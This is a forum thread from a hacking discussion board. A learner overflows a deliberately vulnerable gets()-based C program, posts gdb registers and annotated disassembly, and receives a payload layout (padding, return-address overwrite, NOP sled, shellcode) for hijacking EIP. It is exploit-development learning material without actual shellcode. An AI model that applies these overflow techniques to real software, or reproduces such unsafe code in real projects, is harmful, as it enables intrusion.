 | |
| |||||||
| Home | Register | Projects | Blogs | FAQ | Calendar | Search | Today's Posts | Mark Forums Read | Free Directory | Free DNSReport | Tags |
| Notices |
| Hacking Discuss the art of hacking, your experiences, etc... |
Can you check my stack pleaseThis is a discussion on "Can you check my stack please" within the Hacking part of the Computer Security: Discussions section; Trying to work out what's going on with my buffer overflow. My code void return_input (void) { char array[30]; gets (array); printf("%s\n", array); } main () { return_input(); return 0; } OK my buffer is 30 bytes long, but ... |
 |
| | LinkBack | Thread Tools | Display Modes |
19-09-05
| |||
| |||
 Can you check my stack please Trying to work out what's going on with my buffer overflow. My code void return_input (void) { char array[30]; gets (array); printf("%s\n", array); } main () { return_input(); return 0; } OK my buffer is 30 bytes long, but because of the way memory is allocated it is actually 32 bytes long.so i write in 40 bytes of data and that will overwrite both ebp and eip as they are 4 bytes each. So when do my h3llfyr3@slax:~$ perl -e 'print "A"x40 '|overflow I get (gdb) info registers eax 0x0 0 ecx 0x40142840 1075062848 edx 0x29 41 ebx 0x40141ff4 1075060724 esp 0xbffff508 0xbffff508 ebp 0x41414141 0x41414141 esi 0xbffff58c -1073744500 edi 0x1 1 eip 0x41414141 0x41414141 eflags 0x210286 2163334 cs 0x73 115 ss 0x7b 123 ds 0x7b 123 es 0x7b 123 fs 0x0 0 gs 0x0 0 which is correct as my ebp and eip have now been overwritten with A's. I'm not sure where the space reserved for my array is I know that 32 in hex is 0x20 but can't find a reference to it anywhere, this is confusing me. Below is my disas of main and return input with gdb.Letting me know what is right / wrong would be a geat help. Thanks for bearing with me. (gdb) disas main Dump of assembler code for function main: 0x080483ef <main+0>: push %ebp I think what this is doing is first storing the base pointer on the stack 0x080483f0 <main+1>: mov %esp,%ebp Now it's moving the stack pointer into the base pointer 0x080483f2 <main+3>: sub $0x8,%esp I think this is reserving space for my variable by subtracting 8 from the stack pointer 0x080483f5 <main+6>: and $0xfffffff0,%esp or this might be the space reserved for my variable? 0x080483f8 <main+9>: mov $0x0,%eax adding something to the accumulation regster 0x080483fd <main+14>: sub %eax,%esp not sure 0x080483ff <main+16>: call 0x80483c4 <return_input> This is the ret address that EIP will go back to after the data from array has been collected, my shellcode should start in the address referenced here. 0x08048404 <main+21>: mov $0x0,%eax not sure here either 0x08048409 <main+26>: leave might be finishing the function 0x0804840a <main+27>: ret this is my ret address so the instructions at 0x0804840a is where my shellcode must start, or i need to overwrite the ret address with a new one..... I also can't see anything in, again I'm looking for that 0x20 that is my 30 chars. Dump of assembler code for function return_input: 0x080483c4 <return_input+0>: push %ebp 0x080483c5 <return_input+1>: mov %esp,%ebp 0x080483c7 <return_input+3>: sub $0x28,%esp 0x080483ca <return_input+6>: sub $0xc,%esp 0x080483cd <return_input+9>: lea 0xffffffd8(%ebp),%eax 0x080483d0 <return_input+12>: push %eax 0x080483d1 <return_input+13>: call 0x80482c4 <_init+40> 0x080483d6 <return_input+18>: add $0x10,%esp 0x080483d9 <return_input+21>: sub $0x8,%esp 0x080483dc <return_input+24>: lea 0xffffffd8(%ebp),%eax 0x080483df <return_input+27>: push %eax 0x080483e0 <return_input+28>: push $0x8048524 0x080483e5 <return_input+33>: call 0x80482e4 <_init+72> 0x080483ea <return_input+38>: add $0x10,%esp 0x080483ed <return_input+41>: leave 0x080483ee <return_input+42>: ret  |
| Sponsor | ||
| ||
| |
|
19-09-05
| |||
| |||
| your memory is working 4byte 4byte when you apply 30 byte it has to register 4*8 byte for you in memory, your shellcode lays around esp and some bytes after ebp  as I experienced the address is like 0xbffffa41 and not so much stable ask questions you might have I will try to help you out . so 0x08**** is not where you should jump |
|
20-09-05
| |||
| |||
| Cheers c0d3r Very helpful, I think I'm getting there. 0x080483ff <main+16>: call 0x80483c4 <return_input> OK,so This is the start of my input to the buffer i.e the initial A's the 32 bytes (+8 for ret and sfp) ret and sfp being at the 'end' so my stack looks like this AAAA (RET) AAAA (EBP) AAAAAAAAAAAAAAA (array) gets seems key here, as we persuade it to read the wrong memory address, you said gets takes the top four bytes off the stack, is this what it thinks is the right RET address and loads it into EIP? so my shellcode must go into the adddress where RET is pointing? or doe smy shellcode start here where return_input is? 0x080483ff <main+16>: call 0x80483c4 <return_input> Which part is 'gets'? 0x080483ff <main+16>: call 0x80483c4 <return_input> |
|
20-09-05
| |||
| |||
| see function addresses is different from where we might want to jump , shellcode is being loaded into the stack and in these kind of examples it is around 0xbffff*** , some times we have junks ( will discuss it later ) , all you do is feed it with 32*"\x41"+"\x42\x42\x42\x42"+"\x43\x43\x43\x43"+10 0 NOP+shellcode you will have a core file with illegal instruction at 0x43434343 . send your core to me I will tell you where to jump and why :) |
|
| | |
| check, stack | |
| Thread Tools | |
| Display Modes | |
Linear Mode
| |
Similar Threads | ||||
| Thread | Thread Starter | Forum | Replies | Last Post |
| stack game | fl0 fl0w | Programming | 0 | 31-12-07 12:11 |
| Apple Mac OS X mount_smbfs Stack Based Buffer Overflow Exploit | Heap | Public | 0 | 20-12-07 03:16 |
| Media Player Classic 6.4.9 MP4 File Stack Overflow Exploit | Heap | Public | 0 | 08-12-07 17:19 |
| First exploit coding stack corruption | h3llfyr3 | Hacking | 3 | 24-10-05 10:01 |
| IpSwitch IMAP Server LOGON stack overflow | 0day | 8 | 11-06-05 17:09 | |
